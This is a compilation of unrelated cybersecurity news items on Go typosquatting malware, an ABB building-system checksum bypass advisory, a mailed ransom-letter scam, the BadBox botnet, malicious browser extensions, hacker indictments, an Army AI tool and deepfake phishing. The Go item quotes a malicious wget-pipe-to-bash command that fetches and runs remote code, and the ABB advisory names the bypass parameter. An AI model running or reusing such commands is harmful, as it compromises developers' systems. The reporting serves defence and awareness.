Socket exposes a typosquatting campaign delivering malware to Linux and macOS systems via malicious Go packages. Discover the…

Socket exposes a typosquatting campaign delivering malware to Linux and macOS systems via malicious Go packages. Discover the tactics used, including obfuscation and domain typosquatting, and learn how to stay safe.

Cybersecurity researchers at software supply chain security solutions provider, Socket, have uncovered a concerning new trend where malicious actors are increasingly targeting developers within the Go programming language network.

By employing a technique known as typosquatting, these attackers distribute malware disguised as legitimate Go packages, which are designed to install hidden malware loaders on Linux and macOS systems.

Socket’s investigation, shared with Hackread.com, shows that the attackers have published at least seven of these deceptive packages on the Go Module Mirror, a central repository for Go modules. The full list includes:

*   github.com/vainreboot/layout
*   github.com/utilizedsun/layout
*   github.com/thankfulmai/hypert
*   github.com/shallowmulti/hypert
*   github.com/ornatedoctrin/layout
*   github.com/shadowybulk/hypert
*   github.com/belatedplanet/hypert

These packages impersonate popular libraries, including “hypert” for testing HTTP API clients and “layout” for UI development.

Contextual Details of the Layout Package (Source: Socket)

The “hypert” package appears to be specifically aimed at developers in the financial sector.

Contextual Details of the Malicious Hypert Package (Source: Socket)

This malicious package contains concealed functions (such as qcJjJne()) that enable remote code execution. Upon being imported into a project, the malicious code silently downloads and executes a script from a remote server (alturastreeticu), which, in turn, installs an executable file that can potentially steal sensitive data or credentials.

To evade detection, the attackers employ various techniques. Such as, they utilize array-based string obfuscation to conceal the malicious commands within the code, making it difficult for traditional security tools to identify the threat. For instance, the command

wget -O - https://alturastreeticu/storage/de373d0df/a31546bf | /bin/bash & is split into single-character strings and reconstructed using non-sequential indexing.

 Additionally, the malicious script incorporates a time delay, waiting for an hour before fetching the final payload, which helps them circumvent security measures that focus on immediate actions.

The malicious domains used in this campaign often resemble legitimate websites, particularly those related to financial institutions. This tactic, known as domain typosquatting, aims to deceive users by exploiting their trust in familiar names and brands.

The attackers are also reusing similar payloads and filenames across different domains and IP addresses, suggesting a coordinated and persistent effort.

The f0eee999 ELF file, for example, shows initial minimal malicious behaviour, such as reading /sys/kernel/mm/transparent\_hugepage/, aligning with a cryptominer or loader that remains dormant until conditions are met. This file, along with the a31546bf script, has been observed in Mads Hougesen’s research, “Rogue One: A Malware Story,” indicating potential connections and broader trends, researchers noted.

Socket’s research highlights the growing risks associated with software supply chain attacks, where malicious actors target developers and compromise the integrity of widely used libraries and packages.

Developers are advised to be vigilant when incorporating external packages into their projects. Real-time scanning tools and browser extensions, along with code audits, and careful dependency management practices, are crucial. Developers should also verify package integrity, monitor new repositories, and share indicators of compromise within the community.

Thomas Richards, Principal Consultant, Network and Red Team Practice Director at Black Duck, a Burlington, Massachusetts-based provider of application security solutions, commented on the latest development stating,

_“_This typosquatting attack is not a new attack vector, however, it still underscores how important it is to manage software risk and verify modules are legitimate before they are integrated into source code.  Verifying packages is usually done by signing them before they are added to a central repository. Any application being developed in Go should be reviewed immediately to be sure the malicious packages are not present, and systems have not been compromised._“_

Malware Infects Linux and macOS via Typosquatted Go Packages

Yo, check it - the ABB BMS/BAS system's got a slick little weakness in them caldavInstall.php, caldavInstallAgendav.php, and caldavUpload.php files. All you gotta do is drop that skipChecksum beat in the POST vibe, and bam, the system skips all that MD5 checksum nonsense, no EXPERTMODE needed to crank the funk. This lets any slick cat without a login slide in some jacked-up CalDAV ZIP files, no questions asked. We're talkin' tampered tunes hittin' the deck, openin' the door to messin' with the system or droppin' some nasty uploads, all unauthorized-like. That's the funky flaw, baby - straight-up tamper town.

Title: ABB Cylon Aspect 3.08.01 (caldavUpload.php) Funkalicious Exploit  
Advisory ID: ZSL-2025-5926  
Type: Local/Remote  
Impact: Security Bypass, System Access, DoS  
Risk: (5/5)  
Release Date: 06.03.2025

**Summary**

ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

**Description**

Yo, check it - the ABB BMS/BAS system's got a slick little weakness in them caldavInstall.php, caldavInstallAgendav.php, and caldavUpload.php files. All you gotta do is drop that skipChecksum beat in the POST vibe, and bam, the system skips all that MD5 checksum nonsense, no EXPERTMODE needed to crank the funk. This lets any slick cat without a login slide in some jacked-up CalDAV ZIP files, no questions asked. We're talkin' tampered tunes hittin' the deck, openin' the door to messin' with the system or droppin' some nasty uploads, all unauthorized-like. That's the funky flaw, baby - straight-up tamper town.

**Vendor**

ABB Ltd. - https://www.global.abb

**Affected Version**

NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
Firmware: <=3.08.01

**Tested On**

GNU/Linux 3.15.10 (armv7l)  
GNU/Linux 3.10.0 (x86\_64)  
GNU/Linux 2.6.32 (x86\_64)  
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
PHP/7.3.11  
PHP/5.6.30  
PHP/5.4.16  
PHP/4.4.8  
PHP/5.3.3  
AspectFT Automation Application Server  
lighttpd/1.4.32  
lighttpd/1.4.18  
Apache/2.2.15 (CentOS)  
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86\_64)  
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)  
ErgoTech MIX Deployment Server 2.0.0

**Vendor Status**

\[21.04.2024\] Vulnerability discovered.  
\[22.04.2024\] Vendor contacted.  
\[22.04.2024\] Vendor responds.  
\[02.05.2024\] Working with the vendor.  
\[07.08.2024\] Vendor released version 3.08.02 to address this issue.  
\[06.03.2025\] Public security advisory released.

**PoC**

funkalicious.py

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5860.php  
\[2\] https://packetstorm.news/files/id/189617/

**Changelog**

\[06.03.2025\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

ABB Cylon Aspect 3.08.01 (caldavUpload.php) Funkalicious Exploit

CEOs and business owners received personal, customized ransomware threats in a series of letters sent in the mail through USPS.

Business owners and CEOs across the United States received customized ransomware threats this month from the most unusual of places—letters in the mail.

The letters, which were first reported by multiple cybersecurity researchers, claim to come from a ransomware group called BianLian. But since Malwarebytes first started tracking BianLian nearly one year ago, our intelligence analysts have never seen the cybercriminal gang resort to sending physical letters to make their ransom demands, suggesting that the latest snail mail campaign could be the work of copycats.

The threat, however, is still quite real, especially for small business owners who rely either on themselves or contracted IT services to investigate any technical problems.

According to multiple examples discovered by researchers, the letters in this likely hollow threat were sent through the US Postal Service. The envelopes containing the letters are stamped with the words “TIME SENSITIVE READ IMMEDIATELY” and have the following return address listed:

> BianLian Group  
> 24 Federal St, Suite 100  
> Boston, MA, 02110

The letters themselves lobby a variety of urgent threats to their recipients: Their corporate network has been compromised, sensitive customer and employee data has been stolen, and there is immediately a 10-day deadline to pay a cryptocurrency ransom before the cybercriminals leak the stolen data online.

These threats are standard for ransomware groups today, especially those that have pivoted to not only encrypting a company’s data, but stealing it in the process of an attack to use as further leverage to extort a ransom payment. In fact last year, Malwarebytes wrote about BianLian abusing a common Microsoft tool to avoid cybersecurity detection while storing massive quantities of stolen data from victims.

But the similarities between the threats included in the letter and the recorded actions of BianLian end there. The letter senders claim that they “no longer negotiate with victims,” which is a rarity from ransomware gangs. In fact, the practice is so normalized that a cottage industry of ransomware “negotiators” has popped up to help victims caught in an attack. The letters themselves, researchers said, also include few grammatical errors and better sentence structure than a typical BianLian ransomware note.

One of the letters, in full, begins:

> Dear \[REDACTED\]
> 
> I regret to inform you that we have gained access to \[REDACTED\] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents.

Interestingly, researchers noticed that some of the letters were customized based on their recipient. If a letter was sent to a healthcare CEO, for instance, the letter warned about the theft of patient data; if the letter was sent to a CEO of a product maker, the letter warned about breached customer orders and employee data.

The amounts demanded by the letters varied reportedly from $250,000 to $350,000.

While a “physical” cyberthreat may sound silly, these letters could cause significant harm to small and growing businesses.

These personalized letters convincingly threaten network compromise, password abuse, employee exploitation, and data theft, which can be difficult to verify for any lean organization. Think about it this way: If an everyday person would struggle to check whether their home router had been compromised, many small business owners would struggle to do the same regarding their corporate infrastructure, and that’s through no fault of their own.

If you receive one of these letters in the mail, notify your IT or security team immediately. They can provide the investigation necessary to verify the security of your business.

Whether you have dedicated IT staff or not, you can protect your small business with Malwarebytes Teams, which prevents malware attacks and notifies you about suspicious activity on your network.

 Ransomware threat mailed in letters to business owners 

Removing 24 malicious apps from the Google Play store and silencing some servers has almost halved the BadBox botnet.

Removing 24 malicious apps from the Google Play store and silencing some servers almost halved a botnet known as BadBox.

The BadBox botnet focuses on Android devices, but not just phones. It also affects other devices like TV streaming boxes, tablets, and smart TVs.

The German BSI (Federal Office for Information Security) started the disruption campaign in December by blocking the malware on 30,000 devices. BadBox is referred to as a botnet, because one of its capabilities is to set up the affected device to act as a proxy, allowing other people to use the device’s internet bandwidth and hardware to route their own traffic.

This traffic can for example serve in DDoS attacks or as a platform to spread fake news and disinformation. But BadBox can also steal two-factor authentication (2FA) codes, install further malware, and perform ad fraud.

Unfortunately, the 30,000 devices cut off by the BSI were only the tip of the iceberg. Estimates say there may be as many as one million affected devices. These devices have not necessarily been infected by installing malicious apps. It’s been suggested that Chinese manufacturers hide firmware backdoors in their devices, BadBox being one of them.

The BSI said it found:

> “The BadBox malware was already installed on the respective devices when they were purchased.”

According to Satori Threat Intelligence researchers:

> “Devices connected to the BADBOX 2.0 operation included lower-price-point, “off brand”, uncertified tablets, connected TV (CTV) boxes, digital projectors, and more. The infected devices are Android Open Source Project devices, not Android TV OS devices or Play Protect certified Android devices.”

Off brand devices are devices which do not carry any specific brand name that you might recognize. They are often cheap and made by small manufacturers.

Following the botnet’s development after the German disruption, the researchers found new Command and Control (C2) servers which hosted a list of APKs targeting Android Open Source Project devices similar to those impacted by BadBox.

As part of the disruptions, the servers that were controlling the botnet have been sinkholed, which basically means that the traffic between those servers and the botnet clients gets redirected so it will no longer arrive at the intended destination.

**How to stay safe**

This disruption will likely not be the end of the story. The botnet operators will adapt again and rebuild their infrastructure. Given their supply chain of compromised devices the botnet will resurface soon enough.

So here are a few things you can do:

*   Check you don’t have the apps ‘Earn Extra Income’ and ‘Pregnancy Ovulation Calculator’, which had over 50,000 downloads each. You can recognize the malicious apps from the publisher name Seekiny Studio. If you find them on your device, remove them immediately.
*   Protect your Android devices with an active security solution that can remove malicious apps and block malicious traffic.
*   Google Play Protect automatically warns users and blocks apps known to exhibit BadBox 2.0-associated behavior at install time on Play Protect certified Android devices with Google Play Services. If a device isn’t Play Protect certified, carefully study its origin before purchasing it.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Android botnet BadBox largely disrupted 

Palo Alto, Singapore, 6th March 2025, CyberNewsWire

**Palo Alto, Singapore, March 6th, 2025, CyberNewsWire**

With recent attack disclosures like Browser Syncjacking and extension infostealers, browser extensions have become a primary security concern at many organizations. SquareX’s research team discovers a new class of malicious extensions that can impersonate any extension installed on the victim’s browser, including password managers and crypto wallets. These malicious extensions can morph themselves to have the exact same user interface, icons and text as the legitimate extension, making it an extremely convincing case for victims to enter their credentials and other sensitive information. This attack impacts most major browsers, including Chrome and Edge.

Polymorphic extensions work by exploiting the fact that most users interact with extensions via the pinned in the browser toolbar. The attack begins with the user installing the malicious extension, which disguises itself, for example, as an unassuming AI tool. To make the attack even more convincing, the extension performs the AI functionality as advertised and remains benign for a predetermined period of time. 

However, while all this is happening, the malicious extension starts figuring out what other extensions are installed in the victim’s browser. Once identified, the polymorphic extension completely changes its own appearance to look like the target, including the icon shown on the pinned toolbar. It can even disable the target extension temporarily, removing it from the pinned bar. Given that most users use these icons as a visual confirmation to inform which extension they are interacting with, changing the icon itself is likely sufficient to convince the average user that they are clicking on the legitimate extension. Even if the victim navigates to the extension dashboard, there is no obvious way to correlate the tools displayed there to the pinned icons. To avoid suspicion, the malicious extension can even temporarily disable the target extension such that they are the only ones with the target’s icon on the pinned tab. 

Critically, the polymorphic extension can impersonate any browser extension. For example, it can mimic popular password managers to trick victims into entering their master password. This password can then be used by the attacker to log on to the real password manager and access all credentials stored in the password vault. Similarly, the polymorphic extension can also mimic popular crypto wallets, allowing them to use the stolen credentials to authorize transactions to send cryptocurrency to the attacker. Other potential targets include developer tools and banking extensions that may provide the attacker unauthorized access to apps where sensitive data or financial assets are stored.

Furthermore, the attack only requires medium-risk permissions based on Chrome Store’s classification. Ironically, many of these permissions are used by password managers themselves, as well as other popular tools like ad blockers and page stylers, making it especially difficult for Chrome Store and security teams to identify malicious intent just by looking at the extension’s code.

> The founder of SquareX, Vivek Ramachandran cautions that “Browser extensions present a major risk to enterprises and users today. Unfortunately, most organizations have no way of auditing their current extension footprint and to check whether they are malicious. This further underscores the need for a browser native security solution like Browser Detection and Response, similar to what an EDR is to the operating system.”

These polymorphic extensions exploit existing features within Chrome to conduct the attack. As such, there is no software bug involved, and it cannot be patched. SquareX has written to Chrome for responsible disclosure, recommending banning or implementation of user alerts for any extension icon changes or abrupt changes in HTML, as these techniques can easily be leveraged by attackers to impersonate other extensions in a polymorphic attack. For enterprises, static extension analysis and permissions-based policies are no longer sufficient – it is critical to have a browser-native security tool that can dynamically analyze extension behaviour at runtime, including polymorphic tendencies of malicious extensions. 

For more information about polymorphic extensions, additional findings from this research are available at https://sqrx.com/polymorphic-extensions.

**About SquareX**

SquareX helps organizations detect, mitigate, and threat-hunt client-side web attacks happening against their users in real time, including defending against malicious extensions. In addition to the polymorphic attack, SquareX was also the first to discover and disclose multiple extension-based attacks, including Browser Syncjacking, the Chrome Store consent phishing attack leading to Cyberhaven’s breach and numerous other MV3-compliant malicious extensions revealed at DEF CON 32.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

Additionally, with SquareX, enterprises can provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions. 

**Contact**

**Head of PR**  
**Junice Liew**  
**SquareX**  
**\[email protected\]**

SquareX Unveils Polymorphic Extensions that Morph Infostealers into Any Browser Extension – Password Managers, Wallets at Risk

U.S. indicts 12 in Chinese Hacker-for-Hire Network tied to cyber attacks on governments & media. DOJ offers $10M reward for info on key suspects.

In a major coordinated operation, several U.S. law enforcement agencies have charged 12 Chinese nationals with a series of cyber attacks affecting government bodies, religious groups, media organizations, and international governments.

The indicted individuals include two officers from China’s public security service, employees of a Chinese technology firm, and members of an alleged hacking group known as APT27 which is also called Iron Tiger, Emissary Panda, LuckyMouse, TG-3390, and Bronze Union.

Officials from the Department of Justice, the FBI, the Naval Criminal Investigative Service, and the Departments of State and Treasury made the announcements, linking these cyber actors to operations directed by China’s state security agencies.

According to court documents, the hackers carried out attacks from around 2016 through 2023, compromising critical data through a series of computer intrusions. In many instances, the perpetrators earned significant sums by selling the stolen information to Chinese government agencies.

In its press release, the US Department of Justice stated that a key part of the investigation involves a private firm, i-Soon Information Technology. A federal court in Manhattan unsealed an indictment accusing eight employees from i-Soon along with two public security officers of breaching email accounts, cell phones, servers, and websites.

i-Soon’s penetration system and its software which bypasses Gmail multi-factor authentication (Screenshot: Hackread.com via DoJ)

The court has also authorized the seizure of the primary internet domain tied to this group, which has been linked to cyber activities including the targeting of U.S.-based critics, a U.S. religious organization, and several news outlets.

In parallel, separate indictments are targeting members of the hacking group APT27, who have been active since at least 2013. These charges detail efforts to infiltrate networks across a range of sectors; from technology firms and think tanks to law firms and universities.

Among the claims is a recent hack on the U.S. Treasury conducted late last year, where the use of rented virtual private servers played a key role. Investigators have seized digital infrastructure tied to these operations to dismantle the network. These are the names and job titles of the accused:

Ma Li (马丽), Technical Staff

Wang Zhe (王哲), Sales Director

Sheng Jing (盛晶), MPS Officer

Xu Liang (徐梁), Technical Staff

Wang Liyu (王立宇), MPS Officer

Wang Yan (王堰), Technical Staff

Zhou Weiwei (周伟伟), Technical Staff

Liang Guodong (梁国栋), Technical Staff

Wu Haibo (吴海波), Chief Executive Officer

Chen Cheng (陈诚), Chief Operating Officer

Law enforcement officials have also emphasized that the attackers were not just state-sponsored operatives but also worked as freelancers and through private companies. Their broad targeting has left many systems exposed to further cyber incidents, causing significant financial and reputational damage to affected organizations.

In response to these actions, U.S. authorities have issued attractive rewards for information leading to the identification or location of some of these cyber actors. One reward offer is up to $10 million for details on certain individuals linked to the hacking network, while another program offers up to $2 million for information on others operating from within China.

US Charges 12 in Chinese Hacker Network, Offers $10M Reward

Developed to boost productivity and operational readiness, the AI is now being used to “review” diversity, equity, inclusion, and accessibility policies to align them with President Trump’s orders.

The United States Army is employing a prototype generative artificial intelligence tool to identify references to diversity, equity, inclusion, and accessibility (DEIA) for removal from training materials in line with a recent executive order from President Donald Trump.

Officials at the Army’s Training and Doctrine Command (TRADOC)—the major command responsible for training soldiers, developing leaders, and shaping the service’s guidelines, strategies, and concepts—are currently using the AI tool, dubbed CamoGPT, to “review policies, programs, publications, and initiatives for DEIA and report findings,” according to an internal memo reviewed by WIRED.

The memo followed Trump’s signing of a January 27 executive order titled “Restoring America’s Fighting Force,” which directed Defense Secretary Pete Hegseth to eliminate all Pentagon policies seen as promoting what that the commander in chief declared “un-American, divisive, discriminatory, radical, extremist, and irrational theories” regarding race and gender, a linguistic dragnet that extends as far as past social media posts from official US military accounts.

In an email to WIRED, TRADOC spokesman Army Major Chris Robinson confirmed the use of CamoGPT to review DEIA materials.

TRADOC “will fully execute and implement all directives outlined in the Executive Orders issued by the president. We ensure that these directives are carried out with the utmost professionalism, efficiency, and in alignment with national security objectives,” Robinson says. “Specific details about internal policies and tactics cannot be discussed. However, the use of all tools in our portfolio, including CamoGPT, to increase productivity at all levels can and will be used.”

Developed last summer to boost productivity and operational readiness across the US Army, CamoGPT currently has around 4,000 users who “interact” with it on a daily basis, Captain Aidan Doyle, a CamoGPT data engineer, tells WIRED. The tool is used for everything from developing comprehensive training program materials to producing multilingual translations, with TRADOC providing a “proof of concept and demonstration” at last October’s annual Association of the United States Army conference in Washington, DC, according to Robinson.

While Doyle declined to comment on the specifics on how TRADOC officials were likely using the CamoGPT to scan for DEIA-related policies, he described the process of searching through documents as relatively straightforward.

“I would take all the documentation you want to examine, order it all in a collection on CamoGPT, and then ask questions about the documents,” he says. “The way retrieval-augmented generation works is that the more specific your question is to the concepts inside the document, the more detailed information the model will provide back.”

In practical terms, this means that TRADOC officials are likely inputting a large number of documents into CamoGPT and asking the LLM to scan for targeted keywords like “dignity” or “respect” (which, yes, the Army is currently using to screen past digital content) to identify materials for subsequent alteration and bring them in line with Trump’s executive order.

By using CamoGPT, the work of eliminating DEIA-related content will likely result in a rapid change to the US Army’s documentation. “We’re competing with ‘control+F’ in Adobe Acrobat,” Doyle says.

CamoGPT isn’t the only AI chatbot in the Pentagon’s arsenal: The US Air Force’s NIPRGPT has seen extensive use among airmen since its launch in June for “summarization of documents, drafting of documents and coding assistance,” according to DefenseScoop.

The AI-assisted assessment of US military training materials comes amid a government-wide effort to root out DEIA initiated the day Trump returned to the Oval Office in January to start his second term. Detailed in Trump’s January 27 executive order, the Defense Department’s purge has taken the form of the closure of service-specific DEIA offices and program, a department-wide review of past DEI initiatives, and even the removal of historical content related to the famed all-Black Tuskegee Airmen from Air Force basic training materials, the latter of which was swiftly reversed amid public outcry.

Originally inspired by the public release of OpenAI’s ChatGPT in November 2022, CamoGPT is a product of the Army’s Artificial Intelligence Integration Center (AI2C), the organization formed in 2018 as part of Army Future Command to spearhead AI research and development efforts by “leveraging a soldier workforce to build experimental prototypes,” as Eric Schmitz, AI2C’s operations and intelligence portfolio lead, tells WIRED.

“The mission is to make AI accessible to the Army through experimentation, and we have an ethos and culture that is very much a start-up ethos.” Schmitz says. “We are product-centric and believe AI is inherently software-driven: You can do all the research you like in academia, but if you don't have software to deliver it to somebody and find out if it's useful software, then you’ll never know if your AI is useful in the real world.”

In response to the arrival of ChatGPT, AI2C quickly spun up a CamoGPT prototype based on an open-source LLM in June 2024. The center’s approach to CamoGPT is “model agnostic,” according to Schmitz: While the system currently relies on tech giant Meta’s open-source Llama 3.3 70B LLM, the underlying model is “expendable” should a better version hit the market. What really matters is building software that the average soldier will actually use in their day-to-day operations, an achievement that might influence its long-term adoption across the force.

“When you talk about how the Army doesn’t build software well, it’s because user adoption is not a priority, but it’s a massive priority to us,” Schmitz says.

Whether CamoGPT proliferates more broadly across the Army remains to be seen, and Schmitz and Doyle emphasized that AI2C’s role is laser-focused on experimental prototyping rather than building products ready for immediate fielding. But with the entire federal government reorienting itself in the name of “efficiency,” the success of CamoGPT’s application to Trump’s DEIA overhaul may end up cementing its utility for military planners.

“You need to be ruthlessly critical of what you have built and what you plan to build and hyper focused on driving user adoption,” Schmitz says. “The core question is, how do you build something that’s so valuable that people say they can't live without it?”

The US Army Is Using ‘CamoGPT’ to Purge DEI From Training Materials

Elastic has rolled out security updates to address a critical security flaw impacting the Kibana data visualization dashboard software for Elasticsearch that could result in arbitrary code execution.
The vulnerability, tracked as CVE-2025-25012, carries a CVSS score of 9.9 out of a maximum of 10.0. It has been described as a case of prototype pollution.
"Prototype pollution in Kibana leads to

Elastic Releases Urgent Fix for Critical Kibana Vulnerability Enabling Remote Code Execution

The financially motivated threat actor known as EncryptHub has been observed orchestrating sophisticated phishing campaigns to deploy information stealers and ransomware, while also working on a new product called EncryptRAT.
"EncryptHub has been observed targeting users of popular applications, by distributing trojanized versions," Outpost24 KrakenLabs said in a new report shared with The

EncryptHub Deploys Ransomware and Stealer via Trojanized Apps, PPI Services, and Phishing

YouTube CEO Neal Mohan was impersonated in a deepfake phishing scam. Learn about the attack, how to spot…

YouTube CEO Neal Mohan was impersonated in a deepfake phishing scam. Learn about the attack, how to spot the red flags, and how to protect your account from credential theft.

A new sophisticated phishing operation, leveraging artificial intelligence, has recently targeted YouTube content creators. Scammers have utilized deepfake technology to create a convincing video of YouTube’s CEO, Neal Mohan, delivering a fabricated announcement about changes to the platform’s monetization policies.

This video is privately shared with targeted users to steal their login credentials and install malware on their devices. The fraudulent scheme begins with an email, seemingly originating from an official YouTube address, notifying creators that a private video has been shared with them. The video itself features a remarkably realistic deepfake of Neal Mohan, mimicking his appearance, voice, and mannerisms to an alarming degree.

In the video, the AI-generated Mohan discusses alleged alterations to YouTube’s monetization, urging viewers to take specific actions. These actions typically involve clicking on links, entering login credentials on fake websites, or downloading software from untrusted sources.

The Fraudulent Video (Source: Reddit)

Upon compromising a user’s account, the attackers gain access to their YouTube channel. This access can then be exploited for various malicious purposes, including spreading misinformation, conducting further phishing attacks, or engaging in fraudulent activities.

YouTube has responded to this threat with an urgent warning to its creator community. The company has explicitly stated that it will never share important information or contact users through private videos. Furthermore, they emphasized that any private video claiming to be from YouTube, particularly those featuring its CEO, should be treated as a phishing scam.

“We’re aware that phishers have been sharing private videos to send false videos, including an AI-generated video of YouTube’s CEO Neal Mohan announcing changes in monetization. YouTube and its employees will never attempt to contact you or share information through a private video,” Google’s official announcement read.

“If a video is shared privately with you claiming to be from YouTube, the video is a phishing scam. Do not click these links as the videos will likely lead to phishing sites that can install malware or steal your credentials,” Rob from YouTube warned users.

AI deepfakes are a dangerous illusion created by sophisticated AI models trained on real footage and voice samples, exploiting people’s trust in public figures. Even tech-savvy individuals would struggle to distinguish them from real footage. This incident highlights that the sophistication of phishing attacks has increased, with deepfake technology being used to impersonate high-profile figures like YouTube’s CEO.

Cybercriminals exploit creators’ trust in official platform communications, creating believable deceptions. Content creators are encouraged to exercise caution and avoid downloading files from untrusted sources. If you receive the video, Google recommends following these steps to report it.

Max Gannon, Intelligence Manager at Cofense commented on the latest development stating, _“_Given that deepfakes have typically only been used in high-value targeted scams, it’s a surprise that threat actors are using it for such a broad attack. It’s concerning and potentially indicates a shift in the threat landscape where we can expect to see more deepfakes and other targeted attack methods being broadly applied to larger audiences._“_

_“_However, according to affected users posting about these fake YouTube emails on various social media platforms, the emails deliver malicious executables to steal session cookies and hijack YouTube accounts. Ultimately, the initial phishing hook may be shifting, but the best defence remains the same: training and awareness to detect suspect emails and not click on their links.”

1.  YouTube Channels Hacked to in Fake CS2 Giveaways Scam
2.  Malware in Fake Business Proposals Hits YouTube Creators
3.  Ukrainian News Channel Hacked to Run Zelensky’s Deepfake
4.  Scam Uses AI-Generated Images to Represent Fake Law Firm
5.  “Get Paid to Like Videos” YouTube Scam Leads to Empty Wallets

Latest News